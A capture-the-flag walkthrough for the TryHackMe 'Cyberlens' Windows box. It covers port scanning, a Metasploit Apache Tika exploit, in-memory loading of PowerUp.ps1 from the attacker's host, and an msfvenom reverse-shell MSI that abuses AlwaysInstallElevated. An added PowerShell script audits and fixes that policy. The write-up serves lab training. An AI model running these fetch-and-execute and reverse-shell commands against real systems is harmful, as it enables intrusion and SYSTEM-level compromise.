Try Hack Me: Cyberlens
Today we are going to be looking at Cyberlens, an easy-rated box on Try Hack Me. This box was created by a great mentor, Tyler Ramsbey; you can find his YouTube channel here: https://www.youtube.com/@TylerRamsbey. A video walkthrough for this box will also be coming soon; you can find that here: https://www.youtube.com/@overgrowncarrot1.
Starting off as usual with a port scan, for which we are using rustscan (we also put cyberlens.thm into our /etc/hosts):
rustscan --ulimit 5000 10.10.244.35 -- -Pn
We notice that there are a lot of ports between 4xxxx and 5xxxx, which is normal for Windows due to RPC; however, 6xxxx is not as normal. So first we will see what is running on 61777:
nmap -p 61777 -sC -sV cyberlens.thm -Pn -vv
Looks like we have an Apache Tika server. Using searchsploit we see the following:
searchsploit tika
msfconsole -q
search tika
use 0
set lhost tun0
set rhost cyberlens.thm
set rport 61777
run
Now we can drop into a shell and load PowerShell:
shell
powershell
From here we will put PowerUp.ps1 on the machine:
iex (iwr -usebasicparsing http://<tun0 IP>/PowerUp.ps1)
#make sure to use your own tunnel IP
From here, running Invoke-AllChecks, we see that AlwaysInstallElevated is enabled.
To exploit this we can create a malicious MSI file and then run it for a reverse shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=445 -f msi > shell.msi
#on Windows
mkdir C:\Temp
cd C:\temp
wget http://<tun0 IP>/shell.msi -o shell.msi
Now we can run the shell.msi file; make sure you have a listener running:
msiexec /quiet /qn /i C:\temp\shell.msi
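For the defensive side of the AlwaysInstallElevated finding above, here is an added example (not part of the original walkthrough, and not PowerUp's own code) that audits the policy on a host. It assumes the standard Windows Installer policy key under SOFTWARE\Policies\Microsoft\Windows\Installer; the function names Get-PolicyValue and Test-AlwaysInstallElevated are hypothetical.

```powershell
# Added example: audit the AlwaysInstallElevated Windows Installer policy.
# Windows applies the policy only when the value is 1 in BOTH the machine
# hive (HKLM) and the user hive, so every loaded user hive is checked too.

$SubKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$Name   = 'AlwaysInstallElevated'

function Get-PolicyValue {
    param([string]$Path)
    # Returns the DWORD value, or $null when the key or value is absent.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $item) { return $item.$Name }
    return $null
}

function Test-AlwaysInstallElevated {
    $machine = Get-PolicyValue -Path "HKLM:\$SubKey"
    # Loaded user hives live under HKEY_USERS; skip the *_Classes hives.
    $hives = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -notlike '*_Classes' }
    foreach ($hive in $hives) {
        $sid  = $hive.PSChildName
        $user = Get-PolicyValue -Path "Registry::HKEY_USERS\$sid\$SubKey"
        [pscustomobject]@{
            UserHive     = $sid
            MachineValue = $machine
            UserValue    = $user
            PolicyActive = ($machine -eq 1 -and $user -eq 1)
        }
    }
}

$results = @(Test-AlwaysInstallElevated)
$results | Format-Table -AutoSize

if ($results | Where-Object { $_.PolicyActive }) {
    Write-Warning 'AlwaysInstallElevated is active: MSI packages started by these users install with SYSTEM privileges.'
    # Remediation: disable "Always install with elevated privileges" in Group
    # Policy for both Computer and User configuration, or from an elevated
    # prompt set the machine value to 0:
    # Set-ItemProperty -Path "HKLM:\$SubKey" -Name $Name -Value 0
}
```

Run it from an elevated prompt so that all loaded user hives are readable; a row with PolicyActive set to True is the condition Invoke-AllChecks reported.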
Hopefully you enjoyed it.